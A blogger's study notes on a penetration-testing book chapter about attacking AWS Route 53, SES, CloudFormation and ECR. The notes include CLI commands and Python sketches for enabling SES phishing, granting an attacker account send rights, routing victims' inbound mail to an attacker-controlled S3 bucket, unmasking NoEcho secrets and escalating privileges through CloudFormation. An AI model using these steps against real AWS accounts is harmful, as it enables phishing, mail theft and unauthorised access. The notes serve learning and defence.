Book info – Hands-On AWS Penetration Testing with Kali Linux
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
Ch 14 is quite a bit of content covering different things. After the first read, I think it’s going to be a lab setup that is not necessarily practical given the lab build out done thus far.
Ch 14 – Targeting Other Services
AWS has lots of services, and thus lots of opportunities for exploitation. (Side note: Sometimes Black Hills Information Security will offer 4 hr free previews of their advanced training classes; I've got the Breaching the Cloud with Beau Bullock one on my to-do list. The paid version is currently $395. From the previews I've done of other trainings, that's a bargain.) Any of the services is an opportunity to look at how you would use it and then try to exploit common misconfigurations. This chapter will cover Route 53, Simple Email Service (SES), CloudFormation, and Elastic Container Registry (ECR). All new services to me, so if nothing else it's a good opportunity to get a conceptual understanding of exploiting them.
Route 53
Relates to DNS, unsurprisingly. There's quite a bit you can do with Route 53, and it can be used with VPCs. So if you don't have a domain to use, working through some of this within the lab VPC might be an option.
It's valuable for recon to connect IPs and host names and find domains/subdomains. Make sure that you give the profile you are using rights to work with Route 53. You can pull down hosted zones with:
aws route53 list-hosted-zones --profile <profilename>
Probably nothing will be returned unless you’ve built things out. Then you can pull additional information about the records with:
aws route53 list-resource-record-sets --hosted-zone-id <hostedzoneid> --profile <profilename>
This will return resource record sets with name, type, time-to-live, and resource records. All types of DNS records could be returned – A records, CNAME records, MX records, etc. This can be compared to IP addresses found in other recon to help map out the environment you are exploring. You can also get info about the private hosted zones to gain info about the network internals.
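To show what that cross-referencing might look like, here's a minimal sketch that pulls the A records out of a hypothetical list-resource-record-sets response and builds a hostname-to-IP map. The zone name and IPs are made up for illustration.

```python
import json

# Hypothetical (trimmed) output from `aws route53 list-resource-record-sets`.
sample = json.loads("""
{
  "ResourceRecordSets": [
    {"Name": "app.example.com.", "Type": "A", "TTL": 300,
     "ResourceRecords": [{"Value": "10.0.1.20"}]},
    {"Name": "mail.example.com.", "Type": "MX", "TTL": 300,
     "ResourceRecords": [{"Value": "10 mail.example.com"}]},
    {"Name": "www.example.com.", "Type": "CNAME", "TTL": 300,
     "ResourceRecords": [{"Value": "app.example.com"}]}
  ]
}
""")

# Build a name -> IP map from the A records so they can be compared against
# IP addresses found in other recon.
a_records = {
    rrset["Name"].rstrip("."): [rr["Value"] for rr in rrset["ResourceRecords"]]
    for rrset in sample["ResourceRecordSets"]
    if rrset["Type"] == "A"
}
print(a_records)  # {'app.example.com': ['10.0.1.20']}
```

The same loop could branch on CNAME and MX types to chase aliases and mail servers.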
The authors talk about the potential malicious attacks for Route 53, but they also indicate that these would be unlikely to be used in a pentest. One example would be changing the IPs associated with A records or CNAME records. But messing up DNS could cause major issues, so approach with caution.
You can register domains with Route 53, so it might be possible to add a new domain for the environment you are testing to create a website for a variety of purposes. The resolver info can also provide insight, but typically not an attack vector for pentesting.
Simple Email Service (SES)
The short description: it's an email service, but there's a lot you can do with SES. It can be helpful for social engineering and recon, depending on the access you have. Phishing is an obvious attack vector. With SES access on your compromised creds, check for what you can find to use. This is another one where you need to check the permissions on the profile you are using.
aws ses list-identities --region <region> --profile <profilename>
If a single email address is set up and verified, just that email is available. But when a domain is set up and verified, any email address on the domain or any of its subdomains can be used. Once found, verify sending is enabled:
aws ses get-account-sending-enabled --region <region> --profile <profilename>
Bear in mind that SES is not available in all regions, so you may end up with your SES in a different region than the rest of your lab setup. If you don't have the sending option available but do have the ses:UpdateAccountSendingEnabled permission, you can enable sending to use for phishing.
aws ses update-account-sending-enabled --enabled --region <region> --profile <profilename>
The authors caution about using this option because sending may be disabled for a specific reason and enabling can break things. Once the ability to send is enabled, confirm with:
aws ses get-identity-verification-attributes --identities <email,domain,etc.> --region <region> --profile <profilename>
With a verified identity with sending enabled, it’s time to check the identity policy:
aws ses list-identity-policies --identity <email> --region <region> --profile <profilename>
If no policy names come back, no policies are applied, which means no restrictions and woohoo. When policies are returned, check on what the policies entail:
aws ses get-identity-policies --identity <email> --policy-name <policyname> --region <region> --profile <profilename>
The book demo returns a policy where permissions need to be escalated, which can be done by adding the ARN for the compromised user as a trusted principal. Alternatively, you could add your own AWS account – SES supports cross-account email sending. That could definitely come in handy. Update SES policies with:
aws ses put-identity-policy --identity <email> --policy-name <policyname> --policy file://ses-policy-document.json --region <region> --profile <profilename>
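As a sketch of what that ses-policy-document.json might contain, here's a hypothetical identity policy that adds a compromised user (and an attacker-controlled account) as principals allowed to send. All account IDs and ARNs below are made up.

```python
import json

# Hypothetical SES identity policy granting send rights to a compromised
# user's ARN and an external attacker account. Everything here is made up.
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AttackerSend",
            "Effect": "Allow",
            "Principal": {"AWS": [
                "arn:aws:iam::111111111111:user/compromised-user",
                "arn:aws:iam::222222222222:root"
            ]},
            "Action": ["ses:SendEmail", "ses:SendRawEmail"],
            "Resource": "arn:aws:ses:us-east-1:111111111111:identity/example.com"
        }
    ]
}

# Write the document so it can be passed with --policy file://ses-policy-document.json
with open("ses-policy-document.json", "w") as f:
    json.dump(policy, f, indent=2)
```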
The last little piece is determining if the identity is in the SES sandbox, which restricts sending outside of the account’s list of verified emails/domains. There’s apparently not an easy way to check this from the CLI other than trying to send something, but you can check this from the web console. The restriction has to be manually lifted, so it’s likely been disabled if the account is using SES. To check in the console, go to the Sending Statistics page, go through the regions, and check to see if the account is in the sandbox for that region. Also check for templates already in the account because those would be handy for phishing.
aws ses list-templates --region <region> --profile <profilename>
And then review the content:
aws ses get-template --template-name <templatename> --region <region> --profile <profilename>
Once you've gone through all the recon, use the SendEmail API to start your phishing campaign. If templates are available, you can modify them using UpdateTemplate to manipulate the content to go to a website you've set up or other attack vectors. You could also set up a rule to manipulate what happens with incoming emails, using CreateReceiptRule to port messages over to an S3 bucket in your control. Using S3 buckets with SES is one of the things mentioned early in the SES documentation, so it looks to be fairly common. Once you have things coming over to the S3 bucket, you can check the content, set up Lambda functions, etc.
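As a rough sketch of the Rule structure you'd hand to the CreateReceiptRule API (e.g. via boto3's SES client) to copy inbound mail into a bucket you control – the rule, domain, and bucket names below are hypothetical:

```python
# Hypothetical receipt rule that dumps inbound mail for a domain into an
# attacker-controlled S3 bucket. You'd pass this as the Rule argument to
# the CreateReceiptRule API call.
receipt_rule = {
    "Name": "copy-to-attacker-bucket",
    "Enabled": True,
    "Recipients": ["example.com"],  # catch all mail to the domain
    "Actions": [
        {"S3Action": {
            "BucketName": "attacker-controlled-bucket",
            "ObjectKeyPrefix": "inbound/"
        }}
    ],
    "ScanEnabled": False
}
print(receipt_rule["Name"])
```

The bucket policy has to allow SES to write to it, so that's one more thing to line up before the messages start landing.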
Lots to unpack with this. I think building out the service would be helpful. I’m looking at doing a buildout of Route 53 and SES, but I want to spend a bit more time getting a better understanding of the services.
Attacking all of CloudFormation
So CloudFormation lets you use code to provision resources – looks to be infrastructure as code. There’s a lot there from looking at the service page. I’m feeling like I need to just go back and learn the services covered in this chapter to get a handle on things, but the book examples give a solid overview of how to exploit things. The authors set up a LAMP stack for the demo.
To get info on the stacks:
aws cloudformation describe-stacks --region <region> --profile <profilename>
This will return a lot of info. Check out the parameters to see what's there because they might include sensitive info. The best practice is to set NoEcho to avoid passing sensitive info in the DescribeStacks API. You would still be able to see the fields, but the values would be obfuscated. You might find password info, allowed SSH locations, etc. in the parameters, but I would think even with NoEcho you would be able to gain some valuable insight.
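To make that concrete, here's a small sketch that triages the Parameters section of a hypothetical describe-stacks response – NoEcho values come back masked as asterisks, and even the masked keys tell you which parameters are worth chasing. Stack and parameter names are invented.

```python
import json

# Hypothetical (trimmed) `aws cloudformation describe-stacks` output.
# Parameters hidden by NoEcho come back with masked values.
stacks = json.loads("""
{
  "Stacks": [
    {"StackName": "lamp-stack",
     "Parameters": [
       {"ParameterKey": "DBPassword", "ParameterValue": "****"},
       {"ParameterKey": "DBUser", "ParameterValue": "admin"},
       {"ParameterKey": "SSHLocation", "ParameterValue": "203.0.113.0/24"}
     ]}
  ]
}
""")

# Split masked (NoEcho) parameters from ones exposed in the clear.
masked = [p["ParameterKey"]
          for stack in stacks["Stacks"]
          for p in stack["Parameters"]
          if p["ParameterValue"] == "****"]
clear = {p["ParameterKey"]: p["ParameterValue"]
         for stack in stacks["Stacks"]
         for p in stack["Parameters"]
         if p["ParameterValue"] != "****"}
print(masked)  # ['DBPassword'] -- hidden, but now a known target
print(clear)   # DBUser and the allowed SSH range are exposed outright
```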
Next up is the Outputs section. These are generated during stack creation and could also contain some helpful info like public endpoints. You might also find access info in the outputs section.
Info about termination protection might also be there (best practice is to turn it on). Specify the stack to check this:
aws cloudformation describe-stacks --stack-name <stackname> --region <region> --profile <profilename>
On to deleted stacks, because you can check out deleted stacks. That’s cool. From the console, you can use a dropdown to select deleted stacks. In the CLI, you have to just look through things.
aws cloudformation list-stacks --region <region> --profile <profilename>
Then look through the output for DELETE_COMPLETE. To get details, you need to pass the stack to the command using the ARN for the stack name.
aws cloudformation describe-stacks --stack-name <arn> --region <region> --profile <profilename>
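The filtering step can be sketched like this – pull the StackId ARNs for anything in DELETE_COMPLETE out of a hypothetical list-stacks response, since those ARNs are what describe-stacks needs. The stack names and ARNs are made up.

```python
import json

# Hypothetical (trimmed) `aws cloudformation list-stacks` output. Deleted
# stacks keep their summaries; the StackId ARN is what you pass to
# describe-stacks to get their details.
summaries = json.loads("""
{
  "StackSummaries": [
    {"StackName": "lamp-stack", "StackStatus": "CREATE_COMPLETE",
     "StackId": "arn:aws:cloudformation:us-east-1:111111111111:stack/lamp-stack/aaa"},
    {"StackName": "old-stack", "StackStatus": "DELETE_COMPLETE",
     "StackId": "arn:aws:cloudformation:us-east-1:111111111111:stack/old-stack/bbb"}
  ]
}
""")

deleted = [s["StackId"] for s in summaries["StackSummaries"]
           if s["StackStatus"] == "DELETE_COMPLETE"]
print(deleted)  # one ARN, for old-stack
```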
Deleted stacks are a good place to look for sensitive info in case a stack was deleted because it accidentally exposed info. Exports let you share values between stacks, so that's more info that can come in handy since it allows you to see what info is available to each stack.
aws cloudformation list-exports --region <region> --profile <profilename>
Templates are used to create the stacks, which makes them an obvious thing you want to take a look at. Similarly to getting info about deleted stacks, you can specify the ARN to get details about the template.
aws cloudformation get-template --stack-name <name/ARN> --region <region> --profile <profilename>
This will return the JSON/YAML template used to generate the specified stack. Looking through the template is your best option to start. Scanning the template can also be helpful – the authors recommend cfripper and cfn_nag.
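As a hand-rolled, much-simplified version of what scanners like cfripper and cfn_nag automate, here's a sketch that walks a hypothetical template and flags wildcard IAM actions and resources. The template is invented for illustration.

```python
# Hypothetical CloudFormation template fragment with an over-permissive
# IAM policy baked in.
template = {
    "Resources": {
        "BadPolicy": {
            "Type": "AWS::IAM::Policy",
            "Properties": {
                "PolicyDocument": {
                    "Statement": [
                        {"Effect": "Allow", "Action": "*", "Resource": "*"}
                    ]
                }
            }
        }
    }
}

# Flag any resource whose policy document allows a wildcard action or
# resource -- the kind of finding cfripper/cfn_nag would surface.
findings = []
for name, res in template["Resources"].items():
    doc = res.get("Properties", {}).get("PolicyDocument", {})
    for stmt in doc.get("Statement", []):
        if stmt.get("Action") == "*" or stmt.get("Resource") == "*":
            findings.append(name)
print(findings)  # ['BadPolicy']
```

The real tools cover far more rules (open security groups, unencrypted storage, etc.), so this is just the shape of the idea.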
Roles can be passed when stacks are created, which results in the stack being created with that role. Without a passed role, the stack gets the current user's privileges. Check the DescribeStacks output for RoleARN info to see if roles were passed. You can get resources created by the stack with:
aws cloudformation describe-stack-resources --stack-name <name/ARN> --region <region> --profile <profilename>
Try exploiting what you've found with:
aws cloudformation update-stack --stack-name <name/ARN> --region <region> --template-body file://<file> --parameters file://<file>
This can let you escalate your privileges by creating new resources with the passed roles’ permissions.
A cool tip to close out this section: you can get the values for NoEcho parameters by updating the stack and changing the property value to false. Neat trick if you can use it. Just change something that won't mess things up and update the stack. Then run DescribeStacks again to see what you can see.
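The template edit for that trick can be sketched like this – pull the stack's template, flip NoEcho off, and save it for the update-stack call. The parameter name and template are made up for illustration.

```python
import json

# Hypothetical minimal template with a NoEcho parameter.
template = {
    "Parameters": {
        "DBPassword": {"Type": "String", "NoEcho": True}
    },
    "Resources": {}
}

# Flip NoEcho off so the parameter value shows up in DescribeStacks after
# the stack is updated.
for param in template["Parameters"].values():
    if param.get("NoEcho"):
        param["NoEcho"] = False

# Save the modified template for:
#   aws cloudformation update-stack --template-body file://template.json ...
with open("template.json", "w") as f:
    json.dump(template, f, indent=2)
```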
Elastic Container Registry (ECR)
Basically Docker in AWS. You need the account ID to check out the service. You can pull this info with:
aws sts get-caller-identity
This call would show up in CloudTrail, and Rhino Security Labs has some scripts to get the account ID without hitting CloudTrail. You can pull ECR info with:
aws ecr describe-repositories --region <region> --profile <profilename>
Pull the images with:
aws ecr list-images --repository-name <name> --region <region> --profile <profilename>
And pull the image down with:
$(aws ecr get-login --no-include-email --region <region> --profile <profilename>)
That will return the Docker command to login and automatically execute it. If you see that the login succeeded, you can pull the image using Docker:
docker pull <imageinfo>
Run and drop into bash:
docker run -it --entrypoint /bin/bash <imageinfo>
And then use normal techniques to check things out. If those failed, try checking the repository policy:
aws ecr get-repository-policy --repository-name <name> --region <region> --profile <profilename>
With the right permissions, you can also try injecting malware and pushing an update with the malware. The authors recommend the container analysis tools Anchore Engine and Clair as possibilities for statically analyzing the containers.
That was a lot of material, and labbing this stuff is going to take some serious build-out. Good to know about these services, and important to check out other services as well. Check all the things because you never know.
I feel like this was a good intro to these services and how to think about pentesting the various services offered by cloud providers. The process isn't really any different, but it was interesting to see some services I haven't used before. Really cool. And it's got me curious what possibilities exist for pulling some of the logs over into Azure Sentinel. I know you can bring the logs in, and while I've only just started playing with Sentinel, I can see it being used to detect some of these methods in a way that might not have been readily available previously. You can shove AWS logs into other SIEMs as well (Elastic and Splunk both look to have decent docs based on a quick Google check) – I'm just thinking Sentinel because I'm playing with it and I think I could pull the logs from my AWS environment into an Azure lab environment with Sentinel for a pretty reasonable cost and relatively low effort.